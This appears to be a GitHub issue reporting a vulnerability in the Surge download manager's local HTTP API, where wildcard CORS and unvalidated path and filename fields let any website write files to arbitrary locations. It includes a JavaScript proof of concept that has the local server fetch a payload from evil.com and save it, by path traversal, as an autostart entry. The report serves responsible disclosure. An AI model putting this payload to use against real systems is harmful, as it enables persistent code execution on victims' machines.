Any website can trigger downloads to arbitrary paths while Surge is running

Local HTTP API allows **any website** to trigger file downloads to **arbitrary paths** on the user’s system while Surge is running.

### Root causes

1. **CORS fully open**

```go
w.Header().Set("Access-Control-Allow-Origin", "*")
```

Allows any website to send requests to the local server.

2. **No validation of path or filename**

```go
type DownloadRequest struct {
    URL      string `json:"url"`
    Filename string `json:"filename,omitempty"` // used directly
    Path     string `json:"path,omitempty"`     // used directly
}
```

User-controlled values are used without sanitization.


### Proof of concept

From any webpage:

```js
fetch('http://127.0.0.1:8080/download', {
  method: 'POST',
  headers: {'Content-Type': 'application/json'},
  body: JSON.stringify({
    url: 'http://evil.com/payload.sh',
    path: '../../../.config/autostart',
    filename: 'updater.desktop'
  })
})
```



Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

Any website can trigger downloads to arbitrary paths while Surge is running #4

Root causes

Proof of concept

Metadata

Assignees

Labels

Type

Projects

Milestone

Relationships

Development

Uh oh!

Any website can trigger downloads to arbitrary paths while Surge is running #4

Description

Root causes

Proof of concept

Metadata

Metadata

Assignees

Labels

Type

Projects

Milestone

Relationships

Development

Issue actions